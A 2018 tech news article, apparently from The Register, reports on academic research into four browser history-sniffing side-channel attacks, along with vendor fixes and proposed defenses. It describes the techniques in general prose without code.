50 ways to leave your lover, but four to sniff browser history

Vulnerabilities that expose browsing history yet to be fixed

A bloodhound following a scent

"History sniffing" promises a nose full of dust or, you're talking about web browsers, a whiff of the websites you've visited.

And that may be enough to compromise your privacy and expose data that allows miscreants to target you more effectively with tailored attacks. For example, a phishing gambit that attempts to simulate your bank login page has a better chance of success if it presents the web page for a bank where you actually have an account.

In August, at the 2018 USENIX Workshop on Offensive Technologies (WOOT), security researchers from Stanford University and UC San Diego described four novel attack techniques designed to reveal the browsing histories of internet users.

Three of these consist of "re-paint" attacks, which measure whether browsers change link colors when rendering web links to determine whether the link has been visited before or not. The fourth involves probing the JavaScript bytecode cache to assess whether the target's browser has executed a particular JavaScript file in the past, thereby allowing the attacker to infer whether a specific website has been visited.

CSS page disclosure risks first surfaced in 2002. Though addressed in later years through browser code changes, the issue has resurfaced thanks to evolving web APIs.

Google, given advance noticed by the researchers, fixed the most serious of flaws (CVE-2018-6137) in Chrome 67 back in May. The vulnerability allowed an attacker to determine whether or not a link had been visited by using the CSS Paint API to check if a "paint" method – used to change the color of visited links – had been invoked. The technique allowed an attacker to probe for visited links at a rate of about 3,000 per second.

But three of the vulnerabilities remain. In an email to The Register, Deian Stefan, assistant professor in the UCSD computer science and engineering department, confirmed as much, though he said the flaws are timing side channel attacks, which makes them considerably less severe than the CSS Paint API attack.

Stefan and his colleagues say Google Chrome, Mozilla Firefox, Microsoft Edge and Internet Explorer, and Brave are all affected to some extent. Those who favor the Tor browser are immune to these attacks since Tor doesn't store a user's browser history.

The unaddressed attacks involve abuses of CSS 3D transforms, SVG fill-coloring, and the JavaScript bytecode cache.

The 3D transform attack, for example involves stacking a series of 3D transforms on top of other CSS effects in order to create a link that's difficult to render. By switching the link back and forth between two different destination URLs, in conjunction with the :visited selector, the browser carries out computationally costly re-paint operations when the link's visited status color changes. The attacker can then gather than information via JavaScript by monitoring the webpage's rendering performance.

Deian said the remaining browser history attacks are being discussed by developers involved with the World Wide Web Consortium (W3C). "We've also been talking with Firefox and Chrome folks about doing measurements to see what impact this fix may have on existing sites," he said.

As a defense, the researchers have suggested that browser makers adopt a same-origin-style policy to cover all persistent data, similar to the same-origin policy that restricts scripts to specific domains.

The Register asked Brave, Google, and Mozilla for comment but we've not heard back. ®




Biting the hand that feeds IT © 1998–2018